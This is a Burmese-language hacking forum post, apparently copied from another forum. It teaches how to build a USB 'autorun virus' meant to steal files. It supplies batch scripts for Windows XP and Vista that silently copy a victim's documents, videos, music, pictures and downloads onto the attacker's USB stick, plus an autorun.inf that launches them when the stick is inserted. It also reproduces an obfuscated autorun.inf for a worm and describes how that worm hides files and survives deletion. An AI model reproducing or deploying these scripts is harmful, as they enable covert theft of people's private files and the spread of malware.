virus နာမည္မတပ္တတ္လို႔ autorun လို႔ပဲတပ္လိ္ုက္မယ္ဗ်ာ..
ကြန္ပ်ဴတာတစ္လံုးကို USB drive ေလးထိုးလိုက္တာနဲ႔ ဖိုင္ေတြကို ေနာက္ကြယ္ကေနခိုးေပးမဲ့ autorun viurs ေလးလုပ္မယ္ဗ်ာ...ဒီဗိုင္းရပ္စ္က ၀င္ခံရတဲ့ကြန္ပ်ဴတာထဲကဖိုင္ေတြခိုးရံုကလြဲလို႔ အႏၱရယ္မရွိပါဘူး...ကဲ ပထမဆံုး notepad ေလးဖြင့္လိုက္ပါ..(မဖြင့္တတ္ရင္ window ခလုပ္နဲ႔ r နဲ႔တြဲပီးႏွိပ္ ေပၚလာတဲ့ run box ထဲမွာ notepad လို႔ရိုက္ျပီး enterေခါက္လိုက္ပါ..)
notepad ေလးဖြင့္ျပီးရင္ ေအာက္က ကုတ္ေတြကို ကူးထည့္လိုက္ပါ...ေအာက္ကဟာက Window XP OS ကိုသံုးထားတဲ့စက္အတြက္ပါ...
@echo off:CHECKif not exist "%nyipainglay%\Copied_files" md "%nyipainglay%\Copied_files"if exist "
%systemdrive%\Documents and Settings" goto COPIERgoto ERROR
:COPIERif not exist "%nyipainglay%\Copied_files\%computername%" md "%nyipainglay%\Copied_files\%computername%"if
not exist "%nyipainglay%\Copied_files\%computername%\VIDEOS" md "%nyipainglay%\Copied_files\%computername%
\VIDEOS"if not exist "%nyipainglay%\Copied_files\%computername%\PICTURES" md
"%nyipainglay%\Copied_files\%computername%\PICTURES"if not exist "%nyipainglay%\Copied_files\%computername%\MUSIC" md "%
nyipainglay%\Copied_files\%computername%\MUSIC"if not exist "%nyipainglay%\Copied_files\%computername%\DOWNLOADS" md
"%nyipainglay%\Copied_files\%computername%\DOWNLOADS"copy /y "%userprofile%\My Documents\*.*" "%nyipainglay%\Copied_files\%computername%"copy /y "%userprofile%\My Documents\My Videos" "%nyipainglay%\Copied_files\%computername%\VIDEOS"copy /y "%userprofile%\My Documents\My Music" "%nyipainglay%\Copied_files\%computername%\MUSIC"copy /y "%userprofile%\My Documents\My Pictures" "%nyipainglay%\Copied_files\%computername%\PICTURES"copy /y "%userprofile%\My Documents\Downloads" "%nyipainglay%\Copied_files\%computername%\DOWNLOADS"MSG %username% "DONE!"exit:ERRORexit
ေအာက္ကကုတ္ေလးကေတာ့ Vista အတြက္ပါ...
@echo off:CHECKif not exist “%nyipainglay%\Copied_files” md “%nyipainglay%\Copied_files”if exist “%systemdrive%\files” goto COPIER7goto ERROR:COPIER7if not exist “%nyipainglay%\Copied_files\%computername%” md “%nyipainglay%\Copied_files\%computername%”if not exist “%nyipainglay%\Copied_files\%computername%\VIDEOS” md “%nyipainglay%\Copied_files\%computername%\VIDEOS”if not exist “%nyipainglay%\Copied_files\%computername%\PICTURES” md
“%nyipainglay%\Copied_files\%computername%\PICTURES”if not exist “%nyipainglay%\Copied_files\%computername%\MUSIC” md “%nyipainglay%\Copied_files\%computername%\MUSIC”if not exist “%nyipainglay%\Copied_files\%computername%\DOWNLOADS” md
“%nyipainglay%\Copied_files\%computername%\DOWNLOADS”copy /y “%userprofile%\Documents\*.*” “%nyipainglay%\Copied_files\%computername%”copy /y “%userprofile%\Videos” “%nyipainglay%\Copied_files\%computername%\VIDEOS”copy /y “%userprofile%\Music” “%nyipainglay%\Copied_files\%computername%\MUSIC”copy /y “%userprofile%\Pictures” “%nyipainglay%\Copied_files\%computername%\PICTURES”copy /y “%userprofile%\Downloads” “%nyipainglay%\Copied_files\%computername%\DOWNLOADS”MSG %username% “DONE!”exit:ERRORexit
Window 7 အတြက္ေတာ့ မရွိေသး၀ူးဗ်..ရွိရင္လဲ ရွဲထားခဲ့ပါဦး...
အဲ..ေျပာစရာတစ္ခုက်န္ေသးတယ္ဗ်.. အေပၚက ကုတ္ေတြထဲက nyipainglay ေနရာေတြမွာ ကိုယ့္ USB stick နာမည္ change ေပါ့ဗ်ာ...
မခ်ိန္းခ်င္လဲ စတစ္ကို nyipainglay လို႔ေျပာင္းလိုက္ပါေပါ့ေနာ္....ဟဲ
ကဲ အေပၚက ဟာေတြကို လုပ္ျပီးသြားရင္ save မယ္ဗ်ာ...save တဲ့ေနရာမွာလဲ ၾကိဳက္တဲ့နာမည္တစ္ခုခုရဲ႕ေနာက္မွာ .bat ထည့္ save ရမွာပါ..(ဥပမာ- nyipainglay.bat လိုေပါ့)
ကုတ္ထဲမွာ MD command သံုးထားတဲ့အတြက္ေၾကာင့္ USB stick ထဲကိုCopied_files ဆိုတဲ့ folder ေလးေဆာက္ေပးမယ္ ျပီးရင္ အဲ့ထဲကို ကူးမဲ့ဖိုင္ေတြ သူ႕ဘာသာသူ ကူးထည့္မယ္...
ကဲ virus ေလးေတာ့ လုပ္ျပီးပီ.. ဒီvirus က ကိုယ္မဖြင့္ရင္ ပြင့္မွာမဟုတ္ပါဘူး.. သူမ်ားကြန္ပ်ဴတာထဲက ဖိုင္ေတြကို ခိုးဖို႔စိုက္ျပီး ဒီဖိုင္ေလးဖြင့္ရင္ သူမ်ားက ကိုယ္ခိုးေတာ့မယ္ဆိုတာ သိသြားမွာေပါ့.
ဒီေတာ့ ဒီဗိုင္းရပ္စ္ေလးကို USB stick ေလးစိုက္လိုက္တာနဲ႔ သူဘာသာသူဖြင့္ေအာင္ (autorun ေအာင္) လုပ္ေပးရမွာပါ...ဒါက လြယ္ပါတယ္...notepad ေလးဖြင့္လိုက္ပါဦး..
ျပီးရင္ေအာက္ကကုတ္ေလးကူးထည့္လိုက္...
[autorun]
Open=nyipainglay.bat
Action=File Copier
အဲ့ဒီထဲက nyipainglay.bat ဆိုတဲ့ေနရာမွာ ေစာေစာက လုပ္ထားတဲ့ .bat ဖိုင္အမည္ေလးကို ထည့္ေပးလိုက္ရံုပါပဲ..ျပီးရင္ autorun.inf ဆိုျပီး save လိုက္ပါ...
autorun.inf ဆိုတဲ့ဖိုင္ေရာ .bat (eg: nyipainglay.bat) ဆိုတဲ့ ဖိုင္ႏွစ္ခုစလံုး စတစ္ထဲကို ထည့္လိုက္ပါ....ကဲ လုပ္လို႔ေတာ့ ျပီးသြားျပီဗ်ာ..
စမ္းခ်င္ရင္ စတစ္ကို ျဖဳတ္ျပီး ျပန္တပ္ၾကည့္လိုက္ပါ...တကယ္လို႔ သူ႔ဘာသာသူ ေကာ္ပီကူးမေပးဘူးဆိုရင္ တက္လာတဲ့ autorun ထဲက "play with music player" နဲ႔ "read only" လို ဟာေလးကို ေရြးေပးလိုက္ပါ
ဒါဆိုရင္ File Copier ေလးကို ရွာႏိုင္မွာျဖစ္ပါတယ္.....မွားတာရွိရင္ ေထာက္ျပသြားပါခင္ဗ်ာ
အေပၚကအတိုင္းပဲ ကၽြန္ေတာ့္ဘာသာ autorun virus လို႔ေပးခဲ့ပါတယ္.. ဟုတ္ေပမဲ့ ဒီေကာင္က autorun.inf နဲ႔ တြဲမွသာ autorun ျဖစ္တာပါ...
autorun.inf ဆိုတဲ့ Virus ကို ဒီေန႔မွ ကိုသံလံုငယ္ဆိုက္က သိခဲ့ပါတယ္... ကုတ္ကေတာ့..ေအာက္ကအတိုင္းပါ...notepad ထဲကူးထည့္.. autorun.inf နဲ႔ save လိုက္ရမွာ ျဖစ္ပါတယ္...ကိုသံလံုငယ္ေတာင္ မသတ္ႏိုင္ဘူးဆိုဘဲဗ်...အႏၱရယ္ေတာ့ အမ်ားၾကီး မၾကီးပါဘူး..ကိုယ့္စက္ထဲေတာ့ မဖြင့္ၾကည့္နဲ႔ေပါ့..Defreeze တို႔ shawdow defender တို႔ တင္ထားရင္ေတာ့ လုပ္ေပါ့ဗ်ာ..
.. ;1Kj0aDKwn4LLKLidrsqZqAkIaLKf43iKaDOK8d8iJsor571eKdl0wo27L1
[AutoRun]
;e9L33SLkrokHI8isdlwKF0Lla253dr4sqekD5siilkecj0dw13e8ZKX39wsS3wfaqk7wio1ia
open=n.com
;irllr3rr3jiDia3lw4s52q
shell\open\Command=n.com
;w22swS
shell\open\Default=1
;qKOwXa397Soksk44ai5KjqmkeSIiiasl1ULj0f4iJr43Lsw2fA53FDkrekLdr4LlD1l4jHp2ooi21lkKCoisaiDs0dww42clpi0rkk0dsjfs2kw3dq56ADdsa8k2
shell\explore\Command=n.com
;549AA28likLsmq20aLis9arD53weko4Llo4ilKowi1awf3UnkSraAak23Ia3kfi3dfi00olsw4k2os344k0dw
ဒီဗိုင္းရပ္စ္ရဲ႕ အာနိသင္ေတြကို ကိုသံလံုငယ္ဆိုက္ကဘဲ ကူးျပလုိက္ပါတယ္...
၁ ။ .. Folder Option မွာ open each folder in the same window လို႔ေပးထားရဲ႕သားနဲ႔ Drive ေတြကို D-click နဲ႔ဖြင္႔ရင္ ေနာက္ window တစ္ခုကေနပြင္႔ပါတယ္ ။ ( အဲဒီက တစ္ဆင္႔ ထပ္ဖြင္႔ရင္ေတာ႔ same window ျဖစ္သြားပါတယ္)
၂။ .. Folder Option – View မွာ Show Hidden Files and Folders လို႔ေပးၿပီး Save လိုက္ပါတယ္ ။ Hidden files ေတြ ေပၚမလာပါဘူး ။ Folder Option – View ကိုျပန္ၾကည္႔ Hidden လို႔ျပန္ျဖစ္ေနပါတယ္ ။ ေျပာင္းလို႔မရပါ ။
၃ ။ .. Winrar ကို ဖြင္႔ၿပီး Address bar မွာ C:\\ လို႔ ေရးထည္႔လိုက္ပါ ။ ေအာက္ပါအတိုင္း autorun.inf ဆိုၿပီးေတြ႔ပါတယ္ ။ ျဖတ္လိုက္ပါတယ္ ။ မရပါဘူး ခဏေလးေနၿပီး ျပန္ေပၚလာပါတယ္ ။ တစ္ျခား drive ေတြအားလံုးမွာလဲ အဲဒီဖိုင္ အဲဒီအတိုင္းပဲ ရိွေနပါလိမ္႔မယ္ ။ အေကာင္းဆံုးဆိုတဲ႔ KAV , KIS ေတြနဲ႔ ဗိုင္းရပ္ စစ္ေတာ႔ ေပၚပါတယ္။ Delete နဲ႔ သတ္လိုက္ပါတယ္ ။ ပ်တ္မသြားပါဘူး … ။
copy from
http://mmhackforums.noonhost.com/viewtopic.php?f=10&t=181
